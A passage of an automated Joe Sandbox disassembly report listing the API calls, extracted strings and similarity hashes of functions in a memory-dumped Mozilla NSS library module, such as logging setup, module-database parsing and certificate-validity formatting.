                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                • String ID: %u.%u.%u.%u
                                                                                • API String ID: 1845059423-1542503432
                                                                                • Opcode ID: 2f967f2c81668c21a77052e99333cdea1d265a862c252f95789b63f1b004d9e2
                                                                                • Instruction ID: 1089527e0725a5129f53d7e6a3d8b4a51741e364d9c61e790631286d3ffff865
                                                                                • Opcode Fuzzy Hash: 2f967f2c81668c21a77052e99333cdea1d265a862c252f95789b63f1b004d9e2
                                                                                • Instruction Fuzzy Hash: 6B0278319042568FEB19CF19C8697BEBBF2EF86308F09C25ADC915B291C335D985C792
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CF48637,?,?), ref: 6D089E88
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CF48637), ref: 6D089ED6
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D089EC0
                                                                                • database corruption, xrefs: 6D089ECA
                                                                                • %s at line %d of [%.10s], xrefs: 6D089ECF
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 912837312-598938438
                                                                                • Opcode ID: 03e0a67e9316f3695170c7d2eee3b28685c0502946299a2e8874ca0abc5c21ea
                                                                                • Instruction ID: a2c0fbe25988b8b8d5cc29f4ae68be61d06517921e0748923c37c7118a2f95da
                                                                                • Opcode Fuzzy Hash: 03e0a67e9316f3695170c7d2eee3b28685c0502946299a2e8874ca0abc5c21ea
                                                                                • Instruction Fuzzy Hash: D8819471B0020A8FEF04DFAAD980BEEB7F6BF48304B558169D915AB242D770DE45CB50
                                                                                APIs
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0CD086
                                                                                • PR_Malloc.NSS3(00000001), ref: 6D0CD0B9
                                                                                • PR_Free.NSS3(?), ref: 6D0CD138
                                                                                Similarity
                                                                                • API ID: FreeMallocstrlen
                                                                                • String ID: >
                                                                                • API String ID: 1782319670-325317158
                                                                                • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                • Instruction ID: 5e5d145e8cabd1fa7f907636503c7f8491e1b233cc1de4a4e4cbc02f52832863
                                                                                • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                • Instruction Fuzzy Hash: 09D13862B946470BFB15497D88A13EE77D397C2370F984329D9219B3E5E639C8838327
                                                                                APIs
                                                                                • PK11_FreeSymKey.NSS3(00000002,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,00000002,?), ref: 6D04DD05
                                                                                • PR_SetError.NSS3(FFFFD0AB,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6D04DDCD
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                  • Part of subcall function 6D027F90: PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6D027FB2
                                                                                  • Part of subcall function 6D027F90: PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6D027FD4
                                                                                  • Part of subcall function 6D027F90: PR_ExitMonitor.NSS3(?), ref: 6D02801B
                                                                                • PR_SetError.NSS3(FFFFD0AB,00000000), ref: 6D04DDE4
                                                                                Similarity
                                                                                • API ID: Monitor$Error$CountEnterEntryExitFreeK11_Value
                                                                                • String ID: traffic upd
                                                                                • API String ID: 1369763343-79366657
                                                                                • Opcode ID: 4c5dd4bae58de2f6c782c27f39fe99c525122a50eb6da1172fba98f6bce8cb5f
                                                                                • Instruction ID: b2a8edb157126f7e2b7e5ff95a34c3ee0304c0eabb70f6a40cdf5b05f9681540
                                                                                • Opcode Fuzzy Hash: 4c5dd4bae58de2f6c782c27f39fe99c525122a50eb6da1172fba98f6bce8cb5f
                                                                                • Instruction Fuzzy Hash: 8641E4B1A006059BE714DB69DC81FAFB7F5EBC8304F51442DE50A97250D771A912CBA1
                                                                                APIs
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6D015E08
                                                                                • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D015E3F
                                                                                • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6D015E5C
                                                                                • free.MOZGLUE(00000000), ref: 6D015E7E
                                                                                • free.MOZGLUE(00000000), ref: 6D015E97
                                                                                • PORT_Strdup_Util.NSS3(secmod.db), ref: 6D015EA5
                                                                                • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6D015EBB
                                                                                • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D015ECB
                                                                                • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6D015EF0
                                                                                • free.MOZGLUE(00000000), ref: 6D015F12
                                                                                • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D015F35
                                                                                • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6D015F5B
                                                                                • free.MOZGLUE(00000000), ref: 6D015F82
                                                                                • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6D015FA3
                                                                                • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6D015FB7
                                                                                • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6D015FC4
                                                                                • free.MOZGLUE(00000000), ref: 6D015FDB
                                                                                • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D015FE9
                                                                                • free.MOZGLUE(00000000), ref: 6D015FFE
                                                                                • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D01600C
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D016027
                                                                                • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6D01605A
                                                                                • PR_smprintf.NSS3(6D0EAAF9,00000000), ref: 6D01606A
                                                                                • free.MOZGLUE(00000000), ref: 6D01607C
                                                                                • free.MOZGLUE(00000000), ref: 6D01609A
                                                                                • free.MOZGLUE(00000000), ref: 6D0160B2
                                                                                • free.MOZGLUE(?), ref: 6D0160CE
                                                                                Similarity
                                                                                • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                • API String ID: 1427204090-154007103
                                                                                • Opcode ID: e17c174661a6ad5af31de09f13d8dc982fce9e0c496d238c8f4a7b7a5e4cd264
                                                                                • Instruction ID: 46fea5d02ede00296618791eb0d66747dbf061f4a34f05e67e0d9ac72be8b155
                                                                                • Opcode Fuzzy Hash: e17c174661a6ad5af31de09f13d8dc982fce9e0c496d238c8f4a7b7a5e4cd264
                                                                                • Instruction Fuzzy Hash: 3F91E5B8D082069FFB018FA5AC85BBF3BF4AF06248F440064EC599F242E761D955C7A2
                                                                                APIs
                                                                                • PR_NewLock.NSS3 ref: 6CFA1DA3
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CFA1DB2
                                                                                  • Part of subcall function 6CFA1240: TlsGetValue.KERNEL32(00000040,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1267
                                                                                  • Part of subcall function 6CFA1240: EnterCriticalSection.KERNEL32(?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA127C
                                                                                  • Part of subcall function 6CFA1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1291
                                                                                  • Part of subcall function 6CFA1240: PR_Unlock.NSS3(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA12A0
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFA1DD8
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CFA1E4F
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CFA1EA4
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CFA1ECD
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CFA1EEF
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CFA1F17
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFA1F34
                                                                                • PR_SetLogBuffering.NSS3(00004000), ref: 6CFA1F61
                                                                                • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CFA1F6E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CFA1F83
                                                                                • PR_SetLogFile.NSS3(00000000), ref: 6CFA1FA2
                                                                                • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CFA1FB8
                                                                                • OutputDebugStringA.KERNEL32(00000000), ref: 6CFA1FCB
                                                                                • free.MOZGLUE(00000000), ref: 6CFA1FD2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                • API String ID: 2013311973-4000297177
                                                                                • Opcode ID: 77145d7b2b1a75fea201d78a03dc96bfd0423af43c298f54d7db8ac2af1fce05
                                                                                • Instruction ID: 7c50483360ac13b026c5e0423e5194e5c0f6f1862d990d6614cdcf77ade400bc
                                                                                • Opcode Fuzzy Hash: 77145d7b2b1a75fea201d78a03dc96bfd0423af43c298f54d7db8ac2af1fce05
                                                                                • Instruction Fuzzy Hash: FD51CEB1D04249DFEF00DBE5DD48B9EBBB8AF05308F098128E919DB641E7B1E549CB91
                                                                                APIs
                                                                                • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014C50
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014C5B
                                                                                • PR_smprintf.NSS3(6D0EAAF9,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014C76
                                                                                • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014CAE
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D014CC9
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D014CF4
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D014D0B
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014D5E
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D004F51,00000000), ref: 6D014D68
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6D014D85
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6D014DA2
                                                                                • free.MOZGLUE(?), ref: 6D014DB9
                                                                                • free.MOZGLUE(00000000), ref: 6D014DCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                • API String ID: 3756394533-2552752316
                                                                                • Opcode ID: 9d11df9e9acad05f1f8405cedb3bbda0e72f11c2590297277c7c40f8354771dc
                                                                                • Instruction ID: fcdc138dddd258821c4d1f98b578996936b00a99fc4aa439d449deec39433086
                                                                                • Opcode Fuzzy Hash: 9d11df9e9acad05f1f8405cedb3bbda0e72f11c2590297277c7c40f8354771dc
                                                                                • Instruction Fuzzy Hash: 4E418CB1D04142BBFF125F949C40BBE3AA5AF9A34CF454128E81A5B355EB71D814C7E3
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFBDDDE
                                                                                  • Part of subcall function 6D010FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CFB87ED,00000800,6CFAEF74,00000000), ref: 6D011000
                                                                                  • Part of subcall function 6D010FF0: PR_NewLock.NSS3(?,00000800,6CFAEF74,00000000), ref: 6D011016
                                                                                  • Part of subcall function 6D010FF0: PL_InitArenaPool.NSS3(00000000,security,6CFB87ED,00000008,?,00000800,6CFAEF74,00000000), ref: 6D01102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CFBDDF5
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CFBDE34
                                                                                • PR_Now.NSS3 ref: 6CFBDE93
                                                                                • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CFBDE9D
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFBDEB4
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CFBDEC3
                                                                                • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CFBDED8
                                                                                • PR_smprintf.NSS3(%s%s,?,?), ref: 6CFBDEF0
                                                                                • PR_smprintf.NSS3(6D0EAAF9,(NULL) (Validity Unknown)), ref: 6CFBDF04
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFBDF13
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CFBDF22
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CFBDF33
                                                                                • free.MOZGLUE(00000000), ref: 6CFBDF3C
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFBDF4B
                                                                                • free.MOZGLUE(00000000), ref: 6CFBDF74
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFBDF8E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                • API String ID: 1882561532-3437882492
                                                                                • Opcode ID: 9afb6934a47a78e47b6b582ee8c4c0d44783f405deb2a5ea455ade718a4d6ae3
                                                                                • Instruction ID: 1f9908d81da5e76bda815d11954d53470afe8c0c4fd6e628f21f8bf355f6fe4d
                                                                                • Opcode Fuzzy Hash: 9afb6934a47a78e47b6b582ee8c4c0d44783f405deb2a5ea455ade718a4d6ae3
                                                                                • Instruction Fuzzy Hash: 4D51A0B2E052059BEB10DE669C41BAF7AB9AF95358F154028E809F7705E731D910CBE3
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CFF2DEC
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CFF2E00
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CFF2E2B
                                                                                • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CFF2E43
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CFC4F1C,?,-00000001,00000000,?), ref: 6CFF2E74
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CFC4F1C,?,-00000001,00000000), ref: 6CFF2E88
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFF2EC6
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFF2EE4
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CFF2EF8
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF2F62
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF2F86
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6CFF2F9E
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF2FCA
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF301A
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF302E
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF3066
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF3085
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF30EC
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF310C
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6CFF3124
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF314C
                                                                                  • Part of subcall function 6CFD9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6D00379E,?,6CFD9568,00000000,?,6D00379E,?,00000001,?), ref: 6CFD918D
                                                                                  • Part of subcall function 6CFD9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6D00379E,?,6CFD9568,00000000,?,6D00379E,?,00000001,?), ref: 6CFD91A0
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF316D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                • String ID:
                                                                                • API String ID: 3383223490-0
                                                                                • Opcode ID: 657af346893d00238fcdb8ef6cf18a0810f5e590e2c7ce007cdae9de858e2c5c
                                                                                • Instruction ID: aeb8764e7c1fd23ebe08e571f4b76a18d14db8ae21ba908ed3bb32e3b6e18e00
                                                                                • Opcode Fuzzy Hash: 657af346893d00238fcdb8ef6cf18a0810f5e590e2c7ce007cdae9de858e2c5c
                                                                                • Instruction Fuzzy Hash: 7AF19DB1C002099FEF00DFA4E844B9EBBB5FF09318F154169EC15A7721EB71A996CB91
                                                                                APIs
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CFF6943
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CFF6957
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CFF6972
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CFF6983
                                                                                  • Part of subcall function 6CFF6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CFF69AA
                                                                                  • Part of subcall function 6CFF6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CFF69BE
                                                                                  • Part of subcall function 6CFF6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CFF69D2
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CFF69DF
                                                                                  • Part of subcall function 6CFF6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CFF6A5B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CFF6D8C
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6DC5
                                                                                • free.MOZGLUE(?), ref: 6CFF6DD6
                                                                                • free.MOZGLUE(?), ref: 6CFF6DE7
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CFF6E1F
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6E4B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6E72
                                                                                • free.MOZGLUE(?), ref: 6CFF6EA7
                                                                                • free.MOZGLUE(?), ref: 6CFF6EC4
                                                                                • free.MOZGLUE(?), ref: 6CFF6ED5
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6EE3
                                                                                • free.MOZGLUE(?), ref: 6CFF6EF4
                                                                                • free.MOZGLUE(?), ref: 6CFF6F08
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6F35
                                                                                • free.MOZGLUE(?), ref: 6CFF6F44
                                                                                • free.MOZGLUE(?), ref: 6CFF6F5B
                                                                                • free.MOZGLUE(00000000), ref: 6CFF6F65
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CFF781D,00000000,6CFEBE2C,?,6CFF6B1D,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C40
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CFF781D,?,6CFEBE2C,?), ref: 6CFF6C58
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C6F
                                                                                  • Part of subcall function 6CFF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CFF6C84
                                                                                  • Part of subcall function 6CFF6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CFF6C96
                                                                                  • Part of subcall function 6CFF6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CFF6CAA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6F90
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFF6FC5
                                                                                • PK11_GetInternalKeySlot.NSS3 ref: 6CFF6FF4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
